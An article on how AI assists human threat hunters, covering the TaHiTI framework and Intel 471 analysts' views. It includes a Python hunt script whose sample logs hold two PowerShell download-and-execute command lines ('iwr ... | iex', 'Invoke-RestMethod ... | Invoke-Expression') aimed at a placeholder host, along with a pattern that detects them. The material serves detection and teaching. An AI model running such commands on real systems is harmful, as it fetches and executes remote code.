The Real Role Of AI In Modern Threat Hunting

The increasing presence of Artificial Intelligence (AI) in various aspects of life, including cybersecurity, has sparked debate about its potential to revolutionize threat hunting. While AI is being touted as a game-changer in the field, it’s essential to separate hype from reality and understand its actual capabilities and limitations.

The Role of AI in Threat Hunting

AI is indeed a powerful tool that can aid in threat hunting by speeding up research, enrichment, and reporting. However, it’s crucial to remember that human judgment remains essential in separating real threats from noise. The complexity of cybersecurity threats requires a nuanced approach, and AI should be seen as a co-pilot rather than an autopilot.

The use of AI in threat hunting is not a new concept, but its application has evolved significantly over the past year. Many companies have begun experimenting with agentic AI to automate workflows and plug skills gaps, while attackers are using AI to polish phishing lures, generate deepfakes, and even script parts of data extortion campaigns. Nevertheless, the idea of AI-driven kill chains outpacing human defenders is still more science fiction than fact.

Understanding TaHiTI

One of the most interesting aspects of AI’s emerging role in threat hunting is the development of frameworks like TaHiTI (Targeted Hunting integrating Threat Intelligence). This framework, developed in the financial sector, breaks down hunting into three phases: Initiate, Hunt, and Finalize. TaHiTI is vendor-neutral and forces structure on what can otherwise be chaotic work, making it an effective tool for threat hunters.

According to Scott Poley, a senior threat hunt analyst at Intel 471, TaHiTI works precisely because it reflects the cyclical nature of hunts. AI can speed up the process, but it can’t replace the institutional knowledge that separates theory from reality. Poley emphasizes the importance of using AI as a sounding board, not an oracle, and taking a step-by-step approach to validate or challenge hypotheses.

AI’s Strengths and Limitations

AI’s biggest strengths in threat hunting lie in hypothesis development and faster research. It can help junior analysts by surfacing behaviors or techniques that senior analysts already recognize as relevant, narrowing the skills gap. However, AI-generated queries often have syntax or optimization problems, and Poley has had to correct such queries himself.

Where AI really shines is in enrichment: widening the hunter’s perspective, linking observed activity to adjacent threat-actor techniques, or surfacing PowerShell aliases that a hunter might overlook. Nevertheless, data quality is crucial, and if logs only go back 30 or 60 days, AI will simply amplify the gaps. Lee Archinal, also a senior threat hunt analyst at Intel 471, stresses that AI is best seen as a tool that makes tasks easier, not as a replacement for human expertise.

The Future of AI in Threat Hunting

Looking forward, AI’s role in retrospective analysis and playbooks may prove most valuable. Running yesterday’s hunt against 90 days of logs to spot trends or test hypotheses is grunt work tailor-made for AI. Over time, that history can even train systems to suggest “next steps” based on what worked in similar cases.
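Three points made above fit together in one small script: TaHiTI’s Initiate/Hunt/Finalize structure, the warning that short log retention amplifies gaps, and the idea of re-running a hunt across 90 days of logs. The following is an added example written for this page, not code from Intel 471 or from the TaHiTI framework. The log line format, the alias table, the hunt hypothesis and the sample events are all constructed assumptions; real telemetry would come from an EDR or SIEM and use its own schema.

```python
"""Retrospective hunt runner shaped like TaHiTI's Initiate / Hunt / Finalize.

Added example for this page (not Intel 471 or TaHiTI project code). The log
format, alias table, hypothesis and sample events are constructed assumptions.
"""
import re
from datetime import datetime, timedelta, timezone

# --- Initiate: state the hypothesis and the lookback the hunt will use -------
HYPOTHESIS = ("A PowerShell command line both fetches content over HTTP(S) and "
              "passes it to Invoke-Expression in the same line")

# Aliases a hunter reading raw command lines might overlook. Illustrative subset,
# not a complete PowerShell alias table.
PS_ALIASES = {
    "iex": "Invoke-Expression",
    "iwr": "Invoke-WebRequest",
    "irm": "Invoke-RestMethod",
    "icm": "Invoke-Command",
}
_ALIAS_RE = re.compile(r"\b(" + "|".join(map(re.escape, PS_ALIASES)) + r")\b",
                       re.IGNORECASE)

# Constructed sample telemetry: "<ISO timestamp> <host> <user> <image> <cmdline>".
SAMPLE_LOGS = [
    "2024-06-29T10:15:00Z ws07 alice powershell.exe powershell -nop -c iwr https://example.invalid/a.txt | iex",
    "2024-06-20T08:00:00Z ws03 bob powershell.exe Get-ChildItem C:\\Users",
    "2024-06-10T14:30:00Z ws02 dave powershell.exe iwr https://example.invalid/report.csv -OutFile report.csv",
    "2024-05-15T12:00:00Z srv01 svc_backup powershell.exe Invoke-RestMethod https://example.invalid/h | Invoke-Expression",
    "2024-05-10T09:00:00Z ws07 alice cmd.exe dir C:\\",
    "2024-05-02T00:00:00Z ws11 carol powershell.exe Get-Process",  # oldest retained event
]
NOW = datetime(2024, 6, 30, tzinfo=timezone.utc)  # fixed "today" so results are reproducible


def normalize_ps(cmdline: str) -> str:
    """Expand known aliases so the hypothesis matches either spelling."""
    return _ALIAS_RE.sub(lambda m: PS_ALIASES[m.group(1).lower()], cmdline)


def matches_hypothesis(normalized_cmdline: str) -> bool:
    """Hunt logic for HYPOTHESIS, evaluated on the alias-expanded command line."""
    line = normalized_cmdline.lower()
    fetches = "invoke-webrequest" in line or "invoke-restmethod" in line
    return fetches and "invoke-expression" in line


def parse_log_line(line: str) -> dict:
    """Split one constructed log line into its fields; cmdline keeps its spaces."""
    ts, host, user, image, cmdline = line.split(" ", 4)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
        "host": host, "user": user, "image": image, "cmdline": cmdline,
    }


def run_hunt(log_lines, now=NOW, lookback_days=90) -> dict:
    """Hunt + Finalize: run the hypothesis over the lookback window and report
    both the hits and how much of the requested window the logs actually cover."""
    events = [parse_log_line(l) for l in log_lines if l.strip()]
    window_start = now - timedelta(days=lookback_days)

    # Retention check: a 90-day hunt over 59 days of logs is a 31-day blind spot,
    # and no amount of tooling fills it. Report the gap instead of hiding it.
    oldest = min(e["ts"] for e in events)
    coverage_days = (now - oldest).days
    gap_days = max(0, lookback_days - coverage_days)

    hits = []
    for e in events:
        if e["ts"] < window_start:
            continue
        if not e["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        normalized = normalize_ps(e["cmdline"])
        if matches_hypothesis(normalized):
            hits.append({"ts": e["ts"].isoformat(), "host": e["host"],
                         "user": e["user"], "normalized": normalized})

    # Finalize: the output is a recommendation for an analyst, never an action.
    return {
        "hypothesis": HYPOTHESIS,
        "lookback_days": lookback_days,
        "coverage_days": coverage_days,
        "coverage_gap_days": gap_days,
        "hits": hits,
        "verdict": "escalate for analyst review" if hits else "no findings",
    }


if __name__ == "__main__":
    result = run_hunt(SAMPLE_LOGS)
    print(f"Coverage: {result['coverage_days']} of {result['lookback_days']} days "
          f"(gap {result['coverage_gap_days']} days)")
    for h in result["hits"]:
        print(f"{h['ts']} {h['host']} {h['user']}: {h['normalized']}")
    print("Verdict:", result["verdict"])
```

Two design choices reflect the article’s argument. The alias expansion runs before the hypothesis is evaluated, so the `iwr ... | iex` event is caught even though the raw command line never spells out the cmdlet names. And the result carries a coverage figure alongside the hits: the constructed data only reaches back 59 days, so the 90-day hunt reports a 31-day gap rather than silently returning a partial answer. The verdict is a routing decision for a human analyst; nothing here disables an account or touches a host.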

However, automation should reflect human decisions, not replace them. Poley gives the example of disabling an account, which might stop an attacker but also break a core business process if done at the wrong time. That’s a decision no AI should make without human oversight. The lesson is that AI is here to stay in threat hunting, but it belongs in the loop, not on the trigger.
